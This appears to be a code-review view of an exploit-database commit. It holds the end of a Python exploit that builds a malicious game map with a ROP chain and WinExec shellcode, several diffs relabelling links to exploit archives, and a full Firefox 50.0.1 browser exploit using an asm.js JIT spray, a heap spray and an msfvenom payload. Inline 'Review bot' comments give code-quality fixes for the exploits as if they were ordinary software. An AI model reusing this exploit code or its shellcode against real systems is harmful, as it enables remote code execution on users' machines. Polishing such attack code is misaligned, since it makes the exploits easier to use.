0x381236c5, # MOV ESI,DWORD PTR DS:[EDX] # ADD DH,DH # RETN [steamclient.dll]
0x381ebdc1, # POP EBP # RETN [steamclient.dll]
0x381f98cd, # & jmp esp [steamclient.dll]
0x387885ac, # POP EBX # RETN [steamclient.dll]
0x00000001, # 0x00000001-> ebx
0x384251c9, # POP EDX # RETN [steamclient.dll]
0x00001000, # 0x00001000-> edx
0x387cd449, # POP ECX # RETN [steamclient.dll]
0x00000040, # 0x00000040-> ecx
0x386c57fe, # POP EDI # RETN [steamclient.dll]
0x385ca688, # RETN (ROP NOP) [steamclient.dll]
0x0140b00e, # POP EAX # RETN [hl.exe]
0x90909090, # nop
0x385c0d3e, # PUSHAD # RETN [steamclient.dll]
]
# Can be replaced with ANY shellcode desired...
# http://shell-storm.org/shellcode/files/shellcode-662.php
shellcode = "\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B" + \
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9" + \
"\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C" + \
"\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0" + \
"\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B" + \
"\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72" + \
"\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03" + \
"\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47" + \
"\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F" + \
"\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72" + \
"\x65\x75\xE2\x49\x8B\x72\x24\x03\xF3\x66" + \
"\x8B\x0C\x4E\x8B\x72\x1C\x03\xF3\x8B\x14" + \
"\x8E\x03\xD3\x52\x68\x78\x65\x63\x01\xFE" + \
"\x4C\x24\x03\x68\x57\x69\x6E\x45\x54\x53" + \
"\xFF\xD2\x68\x63\x6D\x64\x01\xFE\x4C\x24" + \
"\x03\x6A\x05\x33\xC9\x8D\x4C\x24\x04\x51" + \
"\xFF\xD0\x68\x65\x73\x73\x01\x8B\xDF\xFE" + \
"\x4C\x24\x03\x68\x50\x72\x6F\x63\x68\x45" + \
"\x78\x69\x74\x54\xFF\x74\x24\x20\xFF\x54" + \
"\x24\x20\x57\xFF\xD0"
shellcode += "\xeb\xfe" # infinite loop! (we dont want hl.exe to crash)
shellcode += "\xeb\xfe"
shellcode += "\xeb\xfe"
shellcode += "\xeb\xfe"
shellcode += "\xeb\xfe"
shellcode_dwords = int(math.ceil(len(shellcode)/4.0))
extra_dwords = int(math.ceil((len(rop_gadgets)+shellcode_dwords)/3.0))
# Loop count (needs to be the exact amount of ROP we want to write
data_buffer.append(dw(extra_dwords))
for addr in rop_gadgets:
data_buffer.append(dw(addr))
for b in range(shellcode_dwords):
data = ""
for byte in range(4):
idx = byte + b*4
# pad to nearest DWORD with INT3
if idx >= len(shellcode):
data += "\xcc"
else:
data += shellcode[idx]
data_buffer.append(data)
second_idx += 8000*4 # time 4 because we skip every-other WORD, which means each index has 4 bytes
# 8000 is arbitrary, but it doesn't cause the map load to exit with a FATAL before
# we can exploit the function
# UNCOMMENT TO CHANGE INITIAL SIZE OF OVERFLOW
#mmfile[NUM_EDGES_OFF] = pack("B", 0x41)
for i in range(int(math.ceil(len(data_buffer)/3.0))):
mmfile[start_idx+4*i:start_idx+4*(i+1)] = pack("I", 8000+i)
mmfile[second_idx+2*i:second_idx+2*(i+1)] = pack("H", 0x1000+i)
second_idx += 2 # required because the game loads every-other word
# This data will now be on the stack
for j in range(3):
sub_idx = j*4 + i*0xc
data_idx = i*3 + j
towrite = ""
if data_idx >= len(data_buffer):
towrite = "\x00"*4
else:
towrite = data_buffer[i*3 + j]
mmfile[vertex_data_start+sub_idx:vertex_data_start+sub_idx+4] = towrite
#l.debug("Write[%08x] --> offset %d" % (unpack("I", towrite)[0], vertex_data_start+sub_idx))
# write out the corrupted file
outfile = open(output_file, "wb")
outfile.write(mmfile)
outfile.close()
l.info("Wrote %d byte exploit file to %s" % (len(mmfile), output_file))
l.info("Copy to game maps/ directory!")
if __name__ == "__main__":
main()
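Review bot: `mmap.mmap(fp.fileno(), 0, access = mmap.ACCESS_READ | mmap.ACCESS_COPY)` treats `access` as a bitmask, but it takes a single constant; this only works because ACCESS_READ (1) | ACCESS_COPY (3) happens to equal ACCESS_COPY, so write `access=mmap.ACCESS_COPY`, which is the mode the in-place slice writes and the final `outfile.write(mmfile)` actually rely on. The header uses `E-DB Note:` for the bin-sploits link while the rest of this commit normalizes that label to `Exploit-DB Mirror:` (see the 39772 hunk, which rewrites `E-DB Mirror:`), so the new file should follow the same convention. Minor: `hexlify`, `unhexlify` and `unpack` are imported but unused (`unpack` appears only in a commented-out debug line), and the comment `# time 4 because we skip every-other WORD` should read "times 4".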

View file

@ -26,7 +26,7 @@ do not use the exploit for attacking.
The attached file is at:
http://ruder.cdut.net/attach/MS_MDB_Vul/Microsoft_Jet_Engine_MDB_File_Parsing_Exploit.rar
backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4625.rar (11162007-Microsoft_Jet_Engine_MDB_File_Parsing_Exploit.rar)
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4625.rar (11162007-Microsoft_Jet_Engine_MDB_File_Parsing_Exploit.rar)
MD5 Hash:73243B8823C8DC2C88AE0529CA13C4C6
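Review bot: the label change is fine, but the integrity line kept as context, `MD5 Hash:73243B8823C8DC2C88AE0529CA13C4C6`, lacks the space after the colon that the other labels in this header use, and MD5 alone is a weak check for an archive that is now served from a second location; consider adding a SHA-256 line for the same `.rar` beside it so readers can confirm that the mirror copy matches the original download.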

View file

@ -20,6 +20,6 @@
was not properly initialized or (2) is deleted, aka "Time Element Memory Corruption Vulnerability."
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20547.rar
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20547.rar

View file

@ -8,7 +8,7 @@ Version: 0.3z R2
Tested on: Windows XP SP3, Windows 7 Ultimate SP1, Windows Server 2003,
Windows Server 2008, it should work on all Windows.
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20758.tar.gz
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20758.tar.gz
*/
#include "main.h"

View file

@ -2,7 +2,7 @@ FreeSSHD all version Remote Authentication Bypass ZERODAY
Discovered & Exploited by Kingcope
Year 2011
## Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23080.zip
# Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23080.zip
Run like:

View file

@ -13,7 +13,7 @@
Generation:
c:\mxmlc\bin>mxmlc.exe AsXploit.as -o AsXploit.swf
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32851-AsXploit.as
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32851-AsXploit.as
-->

View file

@ -0,0 +1,375 @@
<!DOCTYPE HTML>
<!--
FULL ASLR AND DEP BYPASS USING ASM.JS JIT SPRAY (CVE-2017-5375)
PoC Exploit against Firefox 50.0.1 (CVE-2016-9079 - Tor Browser 0day)
Tested on:
Release 50.0.1 32-bit - Windows 8.1 / Windows 10
https://ftp.mozilla.org/pub/firefox/releases/50.0.1/win32/en-US/Firefox%20Setup%2050.0.1.exe
Howto:
1) serve PoC over network and open it in Firefox 50.0.1 32-bit
2) if you don't see cmd.exe, open processexplorer and verify that cmd.exe was spawned by firefox.exe
A successfull exploit attempt should pop cmd.exe
Writeup: https://rh0dev.github.io/blog/2017/the-return-of-the-jit/
(C) Rh0
Jul. 13, 2017
-->
<script async>
function asm_js_module(){
"use asm";
/* huge jitted nop sled */
function payload_code(){
var val = 0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
/* 3 byte VirtualAlloc RWX stager */
val = (val + 0xa890db31)|0;
val = (val + 0xa89030b3)|0;
val = (val + 0xa81b8b64)|0;
val = (val + 0xa80c5b8b)|0;
val = (val + 0xa81c5b8b)|0;
val = (val + 0xa8b9006a)|0;
val = (val + 0xa8904c4c)|0;
val = (val + 0xa8902eb1)|0;
val = (val + 0xa85144b5)|0;
val = (val + 0xa8b99090)|0;
val = (val + 0xa8903233)|0;
val = (val + 0xa89045b1)|0;
val = (val + 0xa8514cb5)|0;
val = (val + 0xa8b99090)|0;
val = (val + 0xa8904e52)|0;
val = (val + 0xa8904bb1)|0;
val = (val + 0xa85145b5)|0;
val = (val + 0xa8590e6a)|0;
val = (val + 0xa84fe789)|0;
val = (val + 0xa8086b8b)|0;
val = (val + 0xa820738b)|0;
val = (val + 0xa8471b8b)|0;
val = (val + 0xa82ae349)|0;
val = (val + 0xa890c031)|0;
val = (val + 0xa890ad66)|0;
val = (val + 0xa89c613c)|0;
val = (val + 0xa8077c9d)|0;
val = (val + 0xa890202c)|0;
val = (val + 0xa89c073a)|0;
val = (val + 0xa8d7749d)|0;
val = (val + 0xa890bdeb)|0;
val = (val + 0xa8b9006a)|0;
val = (val + 0xa890636f)|0;
val = (val + 0xa8906cb1)|0;
val = (val + 0xa8516cb5)|0;
val = (val + 0xa8b99090)|0;
val = (val + 0xa890416c)|0;
val = (val + 0xa89075b1)|0;
val = (val + 0xa85161b5)|0;
val = (val + 0xa8b99090)|0;
val = (val + 0xa8907472)|0;
val = (val + 0xa89056b1)|0;
val = (val + 0xa85169b5)|0;
val = (val + 0xa890eb89)|0;
val = (val + 0xa83cc583)|0;
val = (val + 0xa8006d8b)|0;
val = (val + 0xa890dd01)|0;
val = (val + 0xa878c583)|0;
val = (val + 0xa8006d8b)|0;
val = (val + 0xa890dd01)|0;
val = (val + 0xa820458b)|0;
val = (val + 0xa890d801)|0;
val = (val + 0xa890d231)|0;
val = (val + 0xa890e789)|0;
val = (val + 0xa8590d6a)|0;
val = (val + 0xa810348b)|0;
val = (val + 0xa890de01)|0;
val = (val + 0xa890a6f3)|0;
val = (val + 0xa8900de3)|0;
val = (val + 0xa804c283)|0;
val = (val + 0xa890dbeb)|0;
val = (val + 0xa8247d8b)|0;
val = (val + 0xa890df01)|0;
val = (val + 0xa890ead1)|0;
val = (val + 0xa890d701)|0;
val = (val + 0xa890d231)|0;
val = (val + 0xa8178b66)|0;
val = (val + 0xa81c7d8b)|0;
val = (val + 0xa890df01)|0;
val = (val + 0xa802e2c1)|0;
val = (val + 0xa890d701)|0;
val = (val + 0xa8903f8b)|0;
val = (val + 0xa890df01)|0;
val = (val + 0xa890406a)|0;
val = (val + 0xa890c031)|0;
val = (val + 0xa85030b4)|0;
val = (val + 0xa85010b4)|0;
val = (val + 0xa890006a)|0;
val = (val + 0xa890d7ff)|0;
val = (val + 0xa890c931)|0;
val = (val + 0xa89000b5)|0;
val = (val + 0xa890c3b1)|0;
val = (val + 0xa890ebd9)|0;
val = (val + 0xa82434d9)|0;
val = (val + 0xa890e689)|0;
val = (val + 0xa80cc683)|0;
val = (val + 0xa890368b)|0;
val = (val + 0xa85fc683)|0;
val = (val + 0xa890c789)|0;
val = (val + 0xa81e8b66)|0;
val = (val + 0xa81f8966)|0;
val = (val + 0xa802c683)|0;
val = (val + 0xa802c783)|0;
val = (val + 0xa8901e8a)|0;
val = (val + 0xa8901f88)|0;
val = (val + 0xa803c683)|0;
val = (val + 0xa801c783)|0;
val = (val + 0xa803e983)|0;
val = (val + 0xa89008e3)|0;
val = (val + 0xa890cceb)|0;
val = (val + 0xa890e0ff)|0;
val = (val + 0xa824248d)|0;
/* $ msfvenom --payload windows/exec CMD=cmd.exe EXITFUNC=seh */
val = (val + 0xa882e8fc)|0;
val = (val + 0xa8000000)|0;
val = (val + 0xa8e58960)|0;
val = (val + 0xa864c031)|0;
val = (val + 0xa830508b)|0;
val = (val + 0xa80c528b)|0;
val = (val + 0xa814528b)|0;
val = (val + 0xa828728b)|0;
val = (val + 0xa84ab70f)|0;
val = (val + 0xa8ff3126)|0;
val = (val + 0xa8613cac)|0;
val = (val + 0xa82c027c)|0;
val = (val + 0xa8cfc120)|0;
val = (val + 0xa8c7010d)|0;
val = (val + 0xa852f2e2)|0;
val = (val + 0xa8528b57)|0;
val = (val + 0xa84a8b10)|0;
val = (val + 0xa84c8b3c)|0;
val = (val + 0xa8e37811)|0;
val = (val + 0xa8d10148)|0;
val = (val + 0xa8598b51)|0;
val = (val + 0xa8d30120)|0;
val = (val + 0xa818498b)|0;
val = (val + 0xa8493ae3)|0;
val = (val + 0xa88b348b)|0;
val = (val + 0xa831d601)|0;
val = (val + 0xa8c1acff)|0;
val = (val + 0xa8010dcf)|0;
val = (val + 0xa8e038c7)|0;
val = (val + 0xa803f675)|0;
val = (val + 0xa83bf87d)|0;
val = (val + 0xa875247d)|0;
val = (val + 0xa88b58e4)|0;
val = (val + 0xa8012458)|0;
val = (val + 0xa88b66d3)|0;
val = (val + 0xa88b4b0c)|0;
val = (val + 0xa8011c58)|0;
val = (val + 0xa8048bd3)|0;
val = (val + 0xa8d0018b)|0;
val = (val + 0xa8244489)|0;
val = (val + 0xa85b5b24)|0;
val = (val + 0xa85a5961)|0;
val = (val + 0xa8e0ff51)|0;
val = (val + 0xa85a5f5f)|0;
val = (val + 0xa8eb128b)|0;
val = (val + 0xa86a5d8d)|0;
val = (val + 0xa8858d01)|0;
val = (val + 0xa80000b2)|0;
val = (val + 0xa8685000)|0;
val = (val + 0xa86f8b31)|0;
val = (val + 0xa8d5ff87)|0;
val = (val + 0xa80efebb)|0;
val = (val + 0xa868ea32)|0;
val = (val + 0xa8bd95a6)|0;
val = (val + 0xa8d5ff9d)|0;
val = (val + 0xa87c063c)|0;
val = (val + 0xa8fb800a)|0;
val = (val + 0xa80575e0)|0;
val = (val + 0xa81347bb)|0;
val = (val + 0xa86a6f72)|0;
val = (val + 0xa8ff5300)|0;
val = (val + 0xa86d63d5)|0;
val = (val + 0xa8652e64)|0;
val = (val + 0xa8006578)|0;
val = (val + 0xa8909090)|0;
return val|0;
}
return payload_code
}
</script>
<script>
function spray_asm_js_modules(){
sprayed = []
for (var i=0; i<= 0x1800; i++){
sprayed[i] = asm_js_module()
}
}
/* heap spray inspired by skylined */
function heap_spray_fake_objects(){
var heap = []
var current_address = 0x08000000
var block_size = 0x1000000
while(current_address < object_target_address){
var heap_block = new Uint32Array(block_size/4 - 0x100)
for (var offset = 0; offset < block_size; offset += 0x100000){
/* fake object target = ecx + 0x88 and fake vtable*/
heap_block[offset/4 + 0x00/4] = object_target_address
/* self + 4 */
heap_block[offset/4 + 0x14/4] = object_target_address
/* the path to EIP */
heap_block[offset/4 + 0x18/4] = 4
heap_block[offset/4 + 0xac/4] = 1
/* fake virtual function --> JIT target */
heap_block[offset/4 + 0x138/4] = jit_payload_target
}
heap.push(heap_block)
current_address += block_size
}
return heap
}
/* address of fake object */
object_target_address = 0x30300000
/* address of our jitted shellcode */
jit_payload_target = 0x1c1c0054
/* ASM.JS JIT Spray */
spray_asm_js_modules()
/* Spray fake objects */
heap = heap_spray_fake_objects()
/* -----> */
/* bug trigger ripped from bugzilla report */
var worker = new Worker('data:javascript,self.onmessage=function(msg){postMessage("one");postMessage("two");};');
worker.postMessage("zero");
var svgns = 'http://www.w3.org/2000/svg';
var heap80 = new Array(0x1000);
var heap100 = new Array(0x4000);
var block80 = new ArrayBuffer(0x80);
var block100 = new ArrayBuffer(0x100);
var sprayBase = undefined;
var arrBase = undefined;
var animateX = undefined;
var containerA = undefined;
var offset = 0x88 // Firefox 50.0.1
var exploit = function(){
var u32 = new Uint32Array(block80)
u32[0x4] = arrBase - offset;
u32[0xa] = arrBase - offset;
u32[0x10] = arrBase - offset;
for(i = heap100.length/2; i < heap100.length; i++)
{
heap100[i] = block100.slice(0)
}
for(i = 0; i < heap80.length/2; i++)
{
heap80[i] = block80.slice(0)
}
animateX.setAttribute('begin', '59s')
animateX.setAttribute('begin', '58s')
for(i = heap80.length/2; i < heap80.length; i++)
{
heap80[i] = block80.slice(0)
}
for(i = heap100.length/2; i < heap100.length; i++)
{
heap100[i] = block100.slice(0)
}
animateX.setAttribute('begin', '10s')
animateX.setAttribute('begin', '9s')
containerA.pauseAnimations();
}
worker.onmessage = function(e) {arrBase=object_target_address; exploit()}
//worker.onmessage = function(e) {arrBase=0x30300000; exploit()}
var trigger = function(){
containerA = document.createElementNS(svgns, 'svg')
var containerB = document.createElementNS(svgns, 'svg');
animateX = document.createElementNS(svgns, 'animate')
var animateA = document.createElementNS(svgns, 'animate')
var animateB = document.createElementNS(svgns, 'animate')
var animateC = document.createElementNS(svgns, 'animate')
var idA = "ia";
var idC = "ic";
animateA.setAttribute('id', idA);
animateA.setAttribute('end', '50s');
animateB.setAttribute('begin', '60s');
animateB.setAttribute('end', idC + '.end');
animateC.setAttribute('id', idC);
animateC.setAttribute('end', idA + '.end');
containerA.appendChild(animateX)
containerA.appendChild(animateA)
containerA.appendChild(animateB)
containerB.appendChild(animateC)
document.body.appendChild(containerA);
document.body.appendChild(containerB);
}
window.onload = trigger;
setInterval("window.location.reload()", 3000)
/* <----- */
</script>
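Review bot: several globals in this file are created by assignment rather than declaration: `sprayed = []` inside spray_asm_js_modules, `heap = heap_spray_fake_objects()`, `object_target_address` and `jit_payload_target`; add `var` to each so they are not implicit globals, and replace the string form `setInterval("window.location.reload()", 3000)` with a function argument, `setInterval(function(){ window.location.reload() }, 3000)`. On documentation: the header comment misspells "successfull", and the only note on version dependence is the trailing `// Firefox 50.0.1` on `var offset = 0x88`; the header should state that `offset`, `object_target_address` and `jit_payload_target` are constants for the 32-bit 50.0.1 build listed under "Tested on", since nothing in the file derives them. The loop `for (var i=0; i<= 0x1800; i++)` also compiles 0x1801 modules, one more than the bound suggests; `<` would match the intent if 0x1800 was meant as the count.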

View file

@ -1,5 +1,5 @@
Windows RSH daemon <= 1.8 Remote Buffer Overflow Exploit
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4948.tar.gz (2008-prdelka-vs-MS-rshd.tar.gz)
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4948.tar.gz (2008-prdelka-vs-MS-rshd.tar.gz)
# milw0rm.com [2008-01-21]

View file

@ -1,5 +1,5 @@
Versant server <= 7.0.1.3 Arbitrary Commands Execution Exploit
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5213.zip (2008-versantcmd.zip)
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5213.zip (2008-versantcmd.zip)
# milw0rm.com [2008-03-04]